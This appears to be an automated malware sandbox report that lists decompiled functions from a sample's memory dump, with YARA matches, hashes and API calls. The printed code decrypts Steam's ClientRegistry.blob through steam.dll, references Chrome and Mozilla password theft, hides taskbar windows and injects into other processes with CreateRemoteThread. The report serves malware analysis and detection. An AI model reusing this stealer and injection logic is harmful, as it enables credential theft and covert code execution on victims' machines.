                                    • Opcode ID: 5d5b86d4491df599058b6e76b1a0fdad853a65abe552e2ed81c33660d23bdbaa
                                    • Instruction ID: f3647fd5df690cd9fed9839c66127286085d772b0688f7efead3ea5545aaeab8
                                    • Opcode Fuzzy Hash: 5d5b86d4491df599058b6e76b1a0fdad853a65abe552e2ed81c33660d23bdbaa
                                    • Instruction Fuzzy Hash: 3231E875609300ABE711DFB8C885B5BB7D8EB54748F00882DF688CB2A5D7B5D884CB63
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402E9EC, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 146COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,2402EBCE), ref: 2402EA5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: EnviarStream$GetChromePass$GetContactList$GetCurrentMSNSettings$GetMSNStatus$Mozilla3_5Password$SetMSNStatus$StartHttpProxy
                                    • API String ID: 621844428-2405909186
                                    • Opcode ID: 3d1eaf518a95b70ca1cf5b55d55d5cc14d1118f086f3a2f16286b72978b6a192
                                    • Instruction ID: ffd9935fda3238913ec9bd14668f9fbe7882b3bd8998229c697508ce8c05cbfa
                                    • Opcode Fuzzy Hash: 3d1eaf518a95b70ca1cf5b55d55d5cc14d1118f086f3a2f16286b72978b6a192
                                    • Instruction Fuzzy Hash: 92517470908909AFFB01DFA5CC51AAFBBF8FB95204F518075E418F7288D7749AC18BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403D600, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 132libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E2403D600(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t105;
				intOrPtr _t106;
				void* _t108;

				_t108 = __eflags;
				_t105 = _t106;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				_push(_t105);
				_push(0x2403d7d9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				E24013088(_v8);
				_push(_t105);
				_push(0x2403d7ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				E2403D15C(0x80000001, __ebx, "SteamPath", "Software\\Valve\\Steam\\", __edi, __esi, _t108,  &_v12);
				E240130DC(0x2405cb40, _v12);
				E24013388( &_v16, "/ClientRegistry.Blob",  *0x2405cb40);
				if(E2403D3F8(_v16, _t108) != 0) {
					E24013388( &_v20, "\\ClientRegistry.blob",  *0x2405cb40);
					 *0x2405cb48 = E240234DC(1, 0);
					 *0x2405cb44 = E2403D248(0, 1);
					E24023334( *0x2405cb44, __ebx,  *0x2405cb48, __edi, __esi, E24023180( *0x2405cb48), 1);
					E2403D238(0x2405cb48);
					 *0x2405cb4c = E24013674("Phrase",  *((intOrPtr*)( *0x2405cb44 + 4)));
					 *0x2405cb4c =  *0x2405cb4c + 0x28;
					E24013590( *((intOrPtr*)( *0x2405cb44 + 4)), 0xff,  *0x2405cb4c,  &_v24);
					 *0x2405cb54 = E24013534(_v24);
					E2403D238(0x2405cb44);
					E24013388( &_v28, "\\steam.dll",  *0x2405cb40);
					 *0x2405cb58 = GetProcAddress(LoadLibraryA(E24013534(_v28)), "SteamDecryptDataForThisMachine");
					 *0x2405cb58( *0x2405cb54, E2403D378( *0x2405cb54, __edi), 0x2405cb60, 0x64, 0x2405cb5c);
					E240132EC(_v8, 0x64, 0x2405cb60);
					_pop(_t98);
					 *[fs:eax] = _t98;
				} else {
					_pop(_t101);
					 *[fs:eax] = _t101;
				}
				_pop(_t99);
				 *[fs:eax] = _t99;
				_push(0x2403d7e0);
				return E240130AC( &_v28, 5);
			}















                                    0x2403d600
                                    0x2403d601
                                    0x2403d605
                                    0x2403d606
                                    0x2403d607
                                    0x2403d608
                                    0x2403d609
                                    0x2403d60a
                                    0x2403d60b
                                    0x2403d60c
                                    0x2403d60d
                                    0x2403d60e
                                    0x2403d613
                                    0x2403d614
                                    0x2403d619
                                    0x2403d61c
                                    0x2403d622
                                    0x2403d629
                                    0x2403d62a
                                    0x2403d62f
                                    0x2403d632
                                    0x2403d648
                                    0x2403d655
                                    0x2403d668
                                    0x2403d677
                                    0x2403d696
                                    0x2403d6aa
                                    0x2403d6bd
                                    0x2403d6d9
                                    0x2403d6e3
                                    0x2403d6fa
                                    0x2403d6ff
                                    0x2403d71d
                                    0x2403d72a
                                    0x2403d734
                                    0x2403d74c
                                    0x2403d765
                                    0x2403d787
                                    0x2403d79d
                                    0x2403d7a4
                                    0x2403d7a7
                                    0x2403d679
                                    0x2403d67b
                                    0x2403d67e
                                    0x2403d67e
                                    0x2403d7c0
                                    0x2403d7c3
                                    0x2403d7c6
                                    0x2403d7d8

                                    APIs
                                      • Part of subcall function 2403D15C: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D194
                                      • Part of subcall function 2403D15C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D1B8
                                      • Part of subcall function 2403D15C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001), ref: 2403D1E2
                                      • Part of subcall function 2403D15C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 2403D1FC
                                    • LoadLibraryA.KERNEL32(00000000,SteamDecryptDataForThisMachine,?,00000000,?,?,00000000,2403D7AC,?,00000000,2403D7D9,?,?,?,?,00000000), ref: 2403D75A
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2403D760
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$AddressCloseLibraryLoadOpenProc
                                    • String ID: /ClientRegistry.Blob$Phrase$Software\Valve\Steam\$SteamDecryptDataForThisMachine$SteamPath$\ClientRegistry.blob$\steam.dll
                                    • API String ID: 2859330212-1198945235
                                    • Opcode ID: 2c922d7399686435dada5d433734ebaadaa96e10a540d43e5492c2a8c0bbcf69
                                    • Instruction ID: 4528fdabde31e30e009c5e40282290a982c5814c8aea77971bffa393f329b28c
                                    • Opcode Fuzzy Hash: 2c922d7399686435dada5d433734ebaadaa96e10a540d43e5492c2a8c0bbcf69
                                    • Instruction Fuzzy Hash: D9411A746082449FFB08DFACD89195ABFAAFB58208F504075F804E7255EA79ADC18B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402158C, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 131libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 40%
                                    			E2402158C(void* __eax) {
				struct _MEMORYSTATUS _v44;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				_Unknown_base(*)()* _t83;
				struct HINSTANCE__* _t90;
				_Unknown_base(*)()* _t91;
				intOrPtr* _t92;

				_t92 =  &_v112;
				_v116 = 0xffffffff;
				_v112 = 0xffffffff;
				_t91 = 0;
				_t90 = LoadLibraryA("kernel32.dll");
				if(_t90 != 0) {
					_t83 = GetProcAddress(_t90, "GlobalMemoryStatusEx");
					if(_t83 != 0) {
						_t91 = _t83;
					} else {
						FreeLibrary(_t90);
						_t90 = 0;
					}
				}
				if(_t91 == 0) {
					L15:
					if(_v112 != 0xffffffff || _v116 != 0xffffffff) {
						L26:
						 *_t92 = _v116;
						_v120 = _v112;
						return  *_t92;
					} else {
						_v44.dwLength = 0x20;
						GlobalMemoryStatus( &_v44);
						if(0 > 6) {
							goto L26;
						}
						switch( *((intOrPtr*)(0 +  &M240216E2))) {
							case 0:
								_v116 = _v44.dwMemoryLoad;
								_v112 = 0;
								goto L26;
							case 1:
								_v116 = _v44.dwTotalPhys;
								_v112 = 0;
								goto L26;
							case 2:
								_v116 = _v44.dwAvailPhys;
								_v112 = 0;
								goto L26;
							case 3:
								_v116 = _v44.dwTotalPageFile;
								_v112 = 0;
								goto L26;
							case 4:
								_v116 = _v44.dwAvailPageFile;
								_v112 = 0;
								goto L26;
							case 5:
								_v116 = _v44.dwTotalVirtual;
								_v112 = 0;
								goto L26;
							case 6:
								_v116 = _v44.dwAvailVirtual;
								_v112 = 0;
								goto L26;
						}
					}
				} else {
					E24015474();
					_v108 = 0x40;
					 *_t91( &_v108);
					if(0 > 6) {
						L14:
						FreeLibrary(_t90);
						goto L15;
					}
					switch( *((intOrPtr*)(0 +  &M2402160A))) {
						case 0:
							_v120 = _v108;
							_v116 = 0;
							goto L14;
						case 1:
							_v120 = _v104;
							_v116 = _v100;
							goto L14;
						case 2:
							_v120 = _v96;
							_v116 = _v92;
							goto L14;
						case 3:
							_v120 = _v88;
							_v116 = _v84;
							goto L14;
						case 4:
							_v120 = _v80;
							_v116 = _v76;
							goto L14;
						case 5:
							_v120 = _v72;
							_v116 = _v68;
							goto L14;
						case 6:
							_v120 = _v64;
							_v116 = _v60;
							goto L14;
					}
				}
			}
























                                    0x2402158f
                                    0x24021594
                                    0x2402159c
                                    0x240215a4
                                    0x240215b0
                                    0x240215b4
                                    0x240215bc
                                    0x240215c3
                                    0x240215cf
                                    0x240215c5
                                    0x240215c6
                                    0x240215cb
                                    0x240215cb
                                    0x240215c3
                                    0x240215d3
                                    0x240216a6
                                    0x240216ab
                                    0x2402176c
                                    0x24021770
                                    0x24021777
                                    0x24021788
                                    0x240216bc
                                    0x240216bc
                                    0x240216c9
                                    0x240216d5
                                    0x00000000
                                    0x00000000
                                    0x240216db
                                    0x00000000
                                    0x24021704
                                    0x24021708
                                    0x00000000
                                    0x00000000
                                    0x24021714
                                    0x24021718
                                    0x00000000
                                    0x00000000
                                    0x24021724
                                    0x24021728
                                    0x00000000
                                    0x00000000
                                    0x24021734
                                    0x24021738
                                    0x00000000
                                    0x00000000
                                    0x24021744
                                    0x24021748
                                    0x00000000
                                    0x00000000
                                    0x24021754
                                    0x24021758
                                    0x00000000
                                    0x00000000
                                    0x24021764
                                    0x24021768
                                    0x00000000
                                    0x00000000
                                    0x240216db
                                    0x240215d9
                                    0x240215e2
                                    0x240215e7
                                    0x240215f4
                                    0x240215fd
                                    0x240216a0
                                    0x240216a1
                                    0x00000000
                                    0x240216a1
                                    0x24021603
                                    0x00000000
                                    0x2402162c
                                    0x24021630
                                    0x00000000
                                    0x00000000
                                    0x2402163a
                                    0x24021642
                                    0x00000000
                                    0x00000000
                                    0x2402164c
                                    0x24021654
                                    0x00000000
                                    0x00000000
                                    0x2402165e
                                    0x24021666
                                    0x00000000
                                    0x00000000
                                    0x24021670
                                    0x24021678
                                    0x00000000
                                    0x00000000
                                    0x24021682
                                    0x2402168a
                                    0x00000000
                                    0x00000000
                                    0x24021694
                                    0x2402169c
                                    0x00000000
                                    0x00000000
                                    0x24021603

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 240215AB
                                    • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 240215BC
                                    • FreeLibrary.KERNEL32(00000000,00000000,GlobalMemoryStatusEx,kernel32.dll), ref: 240215C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                    • API String ID: 145871493-802862622
                                    • Opcode ID: e1fb3934133825c4d38daa3d4f2b28a187ec911517f863f4122aae9c70e38406
                                    • Instruction ID: b6818c528f8247894aa1173509f6f87f65344e72adfca0c80db2ed013bb60fe7
                                    • Opcode Fuzzy Hash: e1fb3934133825c4d38daa3d4f2b28a187ec911517f863f4122aae9c70e38406
                                    • Instruction Fuzzy Hash: E2519474A08B41AF9341CF69C48090FBBE5AFC8664F54C92DB4A8DB394E634D9818F53
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401180C, Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E2401180C(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x24011760;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E240117A0;
				}
				_t59[9] = E240117EC;
				_t59[8] = E2401179C;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E2401179C;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x2405b3cc) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E240117A0;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                    0x2401180d
                                    0x24011811
                                    0x24011814
                                    0x24011820
                                    0x2401182d
                                    0x24011832
                                    0x24011837
                                    0x2401183c
                                    0x24011822
                                    0x24011823
                                    0x24011845
                                    0x2401184a
                                    0x2401184f
                                    0x24011825
                                    0x24011826
                                    0x00000000
                                    0x00000000
                                    0x24011856
                                    0x2401185b
                                    0x24011860
                                    0x24011860
                                    0x24011865
                                    0x24011865
                                    0x2401186c
                                    0x24011873
                                    0x2401187e
                                    0x2401193c
                                    0x24011943
                                    0x2401194a
                                    0x24011953
                                    0x2401195f
                                    0x24011965
                                    0x24011961
                                    0x24011961
                                    0x24011961
                                    0x24011955
                                    0x24011955
                                    0x24011955
                                    0x24011967
                                    0x2401196f
                                    0x00000000
                                    0x00000000
                                    0x24011971
                                    0x00000000
                                    0x24011884
                                    0x24011894
                                    0x2401189c
                                    0x240119aa
                                    0x240119aa
                                    0x00000000
                                    0x240119b0
                                    0x240118a2
                                    0x240118aa
                                    0x24011973
                                    0x24011979
                                    0x24011992
                                    0x00000000
                                    0x24011992
                                    0x2401197d
                                    0x24011984
                                    0x24011998
                                    0x2401199d
                                    0x00000000
                                    0x240119a3
                                    0x24011989
                                    0x2401198b
                                    0x2401198b
                                    0x00000000
                                    0x24011989
                                    0x240118b0
                                    0x240118bd
                                    0x240118be
                                    0x00000000
                                    0x00000000
                                    0x240118c4
                                    0x240118c9
                                    0x240118cb
                                    0x240118cb
                                    0x240118da
                                    0x00000000
                                    0x240118e0
                                    0x240118f5
                                    0x240118fa
                                    0x240118fc
                                    0x00000000
                                    0x00000000
                                    0x24011902
                                    0x24011904
                                    0x24011910
                                    0x24011924
                                    0x00000000
                                    0x24011934
                                    0x00000000
                                    0x24011934
                                    0x24011924
                                    0x24011912
                                    0x24011912
                                    0x00000000
                                    0x24011904
                                    0x240118da

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 24011894
                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 240118B8
                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 240118D4
                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 240118F5
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 2401191E
                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 2401192C
                                    • GetStdHandle.KERNEL32(000000F5), ref: 24011967
                                    • GetFileType.KERNEL32(?,000000F5), ref: 2401197D
                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 24011998
                                    • GetLastError.KERNEL32(000000F5), ref: 240119B0
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                    • String ID:
                                    • API String ID: 1694776339-0
                                    • Opcode ID: 5375adedb44e0780fdefc4a4f334666777e8e771e59f5408eda7035d867f4325
                                    • Instruction ID: b3eff8a3c6a3e7c1ac76b44e357d864559ec48cc92848a28bc16ce7744500b40
                                    • Opcode Fuzzy Hash: 5375adedb44e0780fdefc4a4f334666777e8e771e59f5408eda7035d867f4325
                                    • Instruction Fuzzy Hash: 87419130604701AAF72B8F208800B667AE5EF4D754F20CE2DD5EE8F5DCE6659DC48756
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403DC10, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E2403DC10(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v136;
				char _v140;
				void* _t32;
				intOrPtr _t36;
				void* _t40;
				struct HWND__* _t42;
				void* _t45;
				int _t48;

				_t40 = __edi;
				_v140 = 0;
				_v8 = 0;
				_t32 = __eax;
				_push(_t45);
				_push(0x2403dcda);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffff78;
				_t42 = GetWindow(FindWindowA("Shell_TrayWnd", 0), 5);
				if(_t42 == 0) {
					L7:
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(0x2403dce1);
					E24013088( &_v140);
					return E24013088( &_v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t48 = GetClassNameA(_t42,  &_v136, 0x80);
					if(_t48 > 0) {
						E2403DBFC( &_v136,  &_v8);
						E24015948(_v8, _t32,  &_v140, _t40, _t42, _t48);
						E24013480(_v140, "BUTTON");
						if(_t48 == 0) {
							if(_t32 != 1) {
								ShowWindow(_t42, 0);
							} else {
								ShowWindow(_t42, 1);
							}
						}
					}
					_t42 = GetWindow(_t42, 2);
				} while (_t42 != 0);
				goto L7;
			}












                                    0x2403dc10
                                    0x2403dc1d
                                    0x2403dc23
                                    0x2403dc26
                                    0x2403dc2a
                                    0x2403dc2b
                                    0x2403dc30
                                    0x2403dc33
                                    0x2403dc4a
                                    0x2403dc4e
                                    0x2403dcb9
                                    0x2403dcbb
                                    0x2403dcbe
                                    0x2403dcc1
                                    0x2403dccc
                                    0x2403dcd9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2403dc50
                                    0x2403dc50
                                    0x2403dc62
                                    0x2403dc64
                                    0x2403dc6f
                                    0x2403dc7d
                                    0x2403dc8d
                                    0x2403dc92
                                    0x2403dc97
                                    0x2403dca6
                                    0x2403dc99
                                    0x2403dc9c
                                    0x2403dc9c
                                    0x2403dc97
                                    0x2403dc92
                                    0x2403dcb3
                                    0x2403dcb5
                                    0x00000000

                                    APIs
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 2403DC3D
                                    • GetWindow.USER32(00000000,00000005), ref: 2403DC45
                                    • GetClassNameA.USER32(00000000,?,00000080), ref: 2403DC5D
                                    • GetWindow.USER32(00000000,00000002), ref: 2403DCAE
                                      • Part of subcall function 24015948: CharUpperA.USER32(?,00000000,240159BD,?,240632F8,24063310,00000008,?,?,24051C03,00000010,00000000,24051D9B,?,24063304,2406330C), ref: 24015986
                                    • ShowWindow.USER32(00000000,00000001,Shell_TrayWnd,00000000,00000000,2403DCDA), ref: 2403DC9C
                                    • ShowWindow.USER32(00000000,00000000,Shell_TrayWnd,00000000,00000000,2403DCDA), ref: 2403DCA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$Show$CharClassFindNameUpper
                                    • String ID: BUTTON$Shell_TrayWnd
                                    • API String ID: 1958926019-3627955571
                                    • Opcode ID: 4212d337ae881f7530d7ee9016a1edea1fd828872ff8384a097984d72b53da72
                                    • Instruction ID: de0881b947739c5f218af9f93672c5c0b5334381d158da34a15c0459fac4e038
                                    • Opcode Fuzzy Hash: 4212d337ae881f7530d7ee9016a1edea1fd828872ff8384a097984d72b53da72
                                    • Instruction Fuzzy Hash: D411B630931619ABF722D761CD51B8DBEA9AF55B14F8080B0F508E6144EAB0AFC54B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24054028, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 56%
                                    			E24054028(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				char _v20;
				void* _t22;
				void* _t30;
				intOrPtr _t37;
				void* _t40;
				void* _t43;

				_t30 = __ecx;
				_push(__ebx);
				_push(__esi);
				_v8 = __edx;
				_t40 = __eax;
				E24013524(_v8);
				_push(_t43);
				_push(0x240540c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff0;
				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
				_v16 = E24053EC0(_t40, 0, _t30, E24013534(_v8), __edi, _t40);
				_t22 = E24053F80(_t40,  &_v20, E24053FF4, 0, 0xc);
				if(_t22 != 0) {
					CloseHandle(_t22);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x240540cd);
				return E24013088( &_v8);
			}












                                    0x24054028
                                    0x2405402e
                                    0x2405402f
                                    0x24054030
                                    0x24054033
                                    0x24054038
                                    0x2405403f
                                    0x24054040
                                    0x24054045
                                    0x24054048
                                    0x24054062
                                    0x2405407a
                                    0x2405408e
                                    0x2405409f
                                    0x240540a6
                                    0x240540a9
                                    0x240540ae
                                    0x240540b2
                                    0x240540b5
                                    0x240540b8
                                    0x240540c5

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,240540C6), ref: 24054057
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 2405405D
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,240540C6), ref: 2405406F
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 24054075
                                      • Part of subcall function 24053EC0: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,24053F3E,?,?,?,?,00000000,00000000,00000000), ref: 24053EFC
                                      • Part of subcall function 24053EC0: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,24053F3E), ref: 24053F1E
                                      • Part of subcall function 24053F80: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FBE
                                      • Part of subcall function 24053F80: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FCE
                                      • Part of subcall function 24053F80: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FE1
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,240540C6), ref: 240540A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: 96c1c77a0d73dfc248054957a63184b67722f0d05caed2d4221e70270262d7ee
                                    • Instruction ID: 72346669d51578b8918a52779afd203ad565dfc0c6728f4199af936b9efb8cda
                                    • Opcode Fuzzy Hash: 96c1c77a0d73dfc248054957a63184b67722f0d05caed2d4221e70270262d7ee
                                    • Instruction Fuzzy Hash: 08019270A00204BFFB11EBB58C91B9EBAECFF14244BA04564F404F72A9DA709F948B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402BDD4, Relevance: 13.6, APIs: 9, Instructions: 135registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E2402BDD4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				char _v9;
				int _v16;
				int _v20;
				int _v24;
				char _v28;
				char* _v32;
				void* _v36;
				void* _v40;
				long _t88;
				long _t89;
				intOrPtr _t95;
				void* _t101;
				void* _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t106;

				_t106 = __eflags;
				_t103 = _t104;
				_t105 = _t104 + 0xffffffdc;
				_v28 = 0;
				_v8 = __edx;
				_t101 = __eax;
				_push(_t103);
				_push(0x2402bf60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105;
				_v9 = 0;
				E240136BC( &_v28, 0x200);
				_v32 = E2402BDB4(0x2000, 0x200, _t106);
				_push(_t103);
				_push(0x2402bf43);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105;
				do {
					_v16 = 0x200;
					_v20 = 0x2000;
					_t88 = RegEnumValueA(_t101, 0, E24013534(_v28),  &_v16, 0,  &_v24, _v32,  &_v20);
					if(_t88 == 0) {
						_t88 = RegSetValueExA(_v8, E24013534(_v28), 0, _v24, _v32, _v20);
						RegDeleteValueA(_t101, E24013534(_v28));
					}
				} while (_t88 == 0);
				do {
					_v16 = 0x200;
					_v20 = 0x2000;
					_t89 = RegEnumKeyExA(_t101, 0, E24013534(_v28),  &_v16, 0, _v32,  &_v20, 0);
					if(_t89 == 0) {
						_t89 = RegCreateKeyA(_v8, E24013534(_v28),  &_v36);
						if(_t89 == 0) {
							_t89 = RegCreateKeyA(_t101, E24013534(_v28),  &_v40);
							_t113 = _t89;
							if(_t89 == 0) {
